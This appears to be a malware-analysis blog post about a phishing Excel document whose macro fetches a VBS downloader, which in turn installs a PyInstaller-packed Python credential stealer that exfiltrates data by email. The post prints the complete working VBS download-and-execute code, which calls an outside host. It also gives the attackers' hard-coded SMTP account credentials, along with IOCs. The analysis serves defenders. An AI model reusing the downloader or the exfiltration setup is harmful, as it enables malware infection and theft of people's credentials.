# Python stealer distribution via excel maldoc **[malware.love/malware_analysis/reverse_engineering/2021/05/19/unknown-python-stealer.html](https://malware.love/malware_analysis/reverse_engineering/2021/05/19/unknown-python-stealer.html)** May 19, 2021 19 May 2021 » [malware_analysis,](https://malware.love/category/malware_analysis) [reverse_engineering](https://malware.love/category/reverse_engineering) Today I became aware of an interesting sample that turned out to be a stealer written in Python. It all started with an email that had a malicious Excel document attached: 4c9e0da6515b621f41d21f1fd75b30f41ee0765598f1ad4c2a2698f63808445c - PO8506471648.xls As usual, the Excel document contains a macro which downloads and executes another payload. In this case, the second payload was a VBS file stored at ``` hxxp://188[.]127.254.61/6846546874968946.php ``` (One thing to note here is, that the attackers blocked IP addresses from countries outside their current target area for example the download worked from germany but did not work from several other european countries.) The VBS looks pretty simple and only has one job to do, to download and store the final payload : ``` winex_aa = "https://u.teknik.io/0k9L0.mp4" : winex_bb = Right(Year(Now),2) & Right("00" & Month(Now),2) & Right("00" & Day(Now),2) & Right("00" & Hour(Now),2) & Right("00" & Minute(Now),2) & Right("00" & Second(Now),2) : winex_cc = "C:\Windows\Temp\XM" & winex_bb & ".exe" : Set winex_dd = CreateObject("MSXML2.XMLHTTP") : winex_dd.open "GET", winex_aa, false : winex_dd.send() If winex_dd.Status = 200 Then Set winex_ee = CreateObject("ADODB.Stream") : winex_ee.Open : winex_ee.Type = 1 : winex_ee.Write winex_dd.ResponseBody : winex_ee.Position = 0 : winex_ee.SaveToFile winex_cc : winex_ee.Close : Set winex_ee = Nothing End if Set winex_dd = Nothing : Set winex_ff = CreateObject("WScript.Shell") : winex_ff.Exec(winex_cc) ``` The final payload is quite large (13-14MB) and after looking for strings it became clear that it is a malware written in Python with lots of different external modules. ----- ``` ... SNIP bVCRUNTIME140.dll b_bz2.pyd b_cffi_backend.cp37-win_amd64.pyd b_ctypes.pyd b_decimal.pyd b_elementtree.pyd b_hashlib.pyd b_lzma.pyd b_multiprocessing.pyd b_queue.pyd b_socket.pyd b_sqlite3.pyd b_ssl.pyd b_win32sysloader.pyd bcryptography\hazmat\bindings\_constant_time.cp37-win_amd64.pyd bcryptography\hazmat\bindings\_openssl.cp37-win_amd64.pyd blibcrypto-1_1.dll blibssl-1_1.dll bmfc140u.dll bpyexpat.pyd bpython37.dll bpythoncom37.dll bpywintypes37.dll bselect.pyd bsimplejson\_speedups.cp37-win_amd64.pyd bsqlite3.dll btinyaes.cp37-win_amd64.pyd bunicodedata.pyd bwin32api.pyd bwin32com\shell\shell.pyd bwin32crypt.pyd bwin32trace.pyd bwin32ui.pyd bwin32wnet.pyd bxv.exe.manifest opyi-windows-manifest-filename xv.exe.manifest xInclude\pyconfig.h xbase_library.zip xcertifi\cacert.pem xcryptography-2.9.2-py3.7.egg-info\PKG-INFO xcryptography-2.9.2-py3.7.egg-info\SOURCES.txt %python37.dll ... SNIP ``` The most common way to make a windows executable from python code is to use [PyInstaller. In order to reverse the process, you can use PyInstaller Extractor.](https://www.%20pyinstaller.org/) When running Pyinstaller Extractor, you will see quite a lot of useful information in the log for example the used Pyinstaller version, the used Python version and most important, the possible entry point. ----- [As also described on the PyInstaller Extractor Github page, we now can try to decompile](https://github.%20com/extremecoders-re/pyinstxtractor) the pyc files. Since `tx.pyc is the suggested entry point, we will start with that. Before` decompiling the pyc file we need to fix the header because PyInstaller removed those bytes. In order to do so, we just add the following bytes at the beginning of the file `42 0d` ``` 0d 0a 00 00 00 00 e4 b9 18 5d 00 00 00 00 . ``` [For decompiling python byte code, there are different tools available like Uncompyle6 or](https://github.%20com/rocky/python-uncompyle6/) [decompyle3. However, none of them in the latest version worked for me for whatever](https://github.com/rocky/python-decompile3) reason. Maybe it’s because I used the latest version, because Uncompyle6 version `2.7` [seems to work (thanks @bbaskin for the hint). I ended up using unpyc3 to decompile the](https://twitter.com/bbaskin) [pyc file which gave me beautiful round about 12.000 lines of python code.](https://gist.github.com/lazydaemon/0c783dd7fd057b2acc2298e0e6b732c3) I just analyzed a small portion of the sample because when scrolling through the code, it was quite obvious that this must be stealer. There are tons of functions searching for [credentials for different tools/services, even KeeThief is included.](https://github.com/GhostPack/KeeThief) My interest was in how the data is exfiltrated. After searching around a little bit, I could spot a list, containing two dictionaries with smtp credentials (I renamed the variable for better readability). ``` emails_for_exfil = [ {'email': 'ggveddy@yahoo.com', 'pass': 'lyhdqnatklklhvzf', 'server': 'smtp.mail.yahoo.com', 'port': 587,'security': 'TLS'}, {'email': 'ggceddy@yahoo.com', 'pass': 'fagvjohnktkopgol', 'server': 'smtp.mail.yahoo.com', 'port': 587, 'security': 'TLS'}] ``` [Following this list I could spot the function sending emails which takes the harvested](https://gist.github.com/lazydaemon/0c783dd7fd057b2acc2298e0e6b732c3#file-python_stealer-py-L11542) [credentials as input. Similar to AgentTesla, this stealer is exfiltrating stolen data via sending](https://isc.sans.%20edu/forums/diary/Agent+Tesla+Trojan+Abusing+Corporate+Email+Accounts/25336/) emails to specific hard-coded accounts. There is currently no official name for the malware and it does not appear to be widespread. [James flagged it as Eightaliuim because of some strings inside the sample.](https://twitter.com/James_inthe_box) ----- If anyone has more samples or more details about this campaign, please let me know. _IOCs:_ ``` Excel dropper: 4c9e0da6515b621f41d21f1fd75b30f41ee0765598f1ad4c2a2698f63808445c Download link for the VBS called from the dropper: http://188.127.254.61/6846546874968946.php VBS payload to download final payload: ad109cb6bedbe3a492aca14b5ce603465b52aa88a3477692591556ef8702227e Called from the VBS payload to download the final payload: https://u.teknik.io/0k9L0.mp4 Email receiving stolen credentials: ggveddy@yahoo.com ggceddy@yahoo.com ``` **Related Posts** [Having fun with a Ursnif VBS dropper (Categories:](https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html) [malware_analysis,](https://malware.love/category/malware_analysis.html) [reverse_engineering)](https://malware.love/category/reverse_engineering.html) [Trickbot tricks again [UPDATE] (Categories: malware_analysis,](https://malware.love/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html) [reverse_engineering)](https://malware.love/category/reverse_engineering.html) [Trickbot tricks again (Categories:](https://malware.love/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html) [malware_analysis,](https://malware.love/category/malware_analysis.html) [reverse_engineering)](https://malware.love/category/reverse_engineering.html) [« Having fun with a Ursnif VBS dropper](https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html) -----